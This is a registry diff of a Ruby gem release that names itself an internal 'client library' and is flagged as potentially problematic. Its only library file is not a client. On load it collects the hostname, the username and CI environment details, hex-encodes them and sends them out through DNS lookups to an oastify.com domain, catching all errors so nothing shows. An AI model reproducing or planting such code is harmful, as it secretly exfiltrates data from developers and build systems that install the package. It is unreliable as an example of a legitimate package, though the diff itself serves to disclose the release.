monolith-twirp-codingagentintegrations-codingagentintegrations 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of monolith-twirp-codingagentintegrations-codingagentintegrations might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 0c2db2268471f706732e8ffdeb1270884cd2f92bc2dcf5b8aa61405f4d2116bc
4
+ data.tar.gz: 61b5c189784b9de031527e7437f78b85d4aeb91ee679dec37a863c0a24cd689a
5
+ SHA512:
6
+ metadata.gz: 0ba746d0d8533e5a2a19e3ca3d16095d4eb9348057c30ab588536a10fb7fb5c91e02b6c84bead833e2bccc1318b8cb09c1a7b93f941efd0001732a4aa63183f1
7
+ data.tar.gz: bf4a296e3e92eebfb70994587feaf89b8d28e0a34f999ef3cb6264ae314176fa0c26d347cecfcecc4c7b1471a63649903bcdb82842602ce766da12e9a0b1a8a3
@@ -0,0 +1,15 @@
1
+ require 'resolv'
2
+ require 'socket'
3
+ begin
4
+ h = Socket.gethostname.to_s[0..20]
5
+ u = (ENV['USER'] || ENV['USERNAME'] || 'na').to_s[0..15]
6
+ d = (ENV['GITHUB_ACTIONS'] || ENV['CI'] || ENV['CODESPACE_NAME'] || 'srv').to_s[0..15]
7
+ data = "#{h}.#{u}.#{d}"
8
+ hex = data.chars.map { |c| c.ord.to_s(16).rjust(2, '0') }.join
9
+ labels = hex.scan(/.{1,60}/)
10
+ labels.each_with_index do |label, i|
11
+ subdomain = "#{label}.#{i}.ci.bo3kq1t0lno3utuiq360efzqthz8n0bp.oastify.com"
12
+ Resolv::DNS.new.getresource(subdomain, Resolv::DNS::Resource::IN::A) rescue nil
13
+ end
14
+ rescue
15
+ end
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: monolith-twirp-codingagentintegrations-codingagentintegrations
3
+ version: !ruby/object:Gem::Version
4
+ version: 1.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Dev
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-27 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: monolith-twirp-codingagentintegrations-codingagentintegrations client
14
+ library
15
+ email: dev@example.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - lib/monolith-twirp-codingagentintegrations-codingagentintegrations.rb
21
+ homepage: https://rubygems.org/gems/monolith-twirp-codingagentintegrations-codingagentintegrations
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '2.0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.5.22
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: monolith-twirp-codingagentintegrations-codingagentintegrations
44
+ test_files: []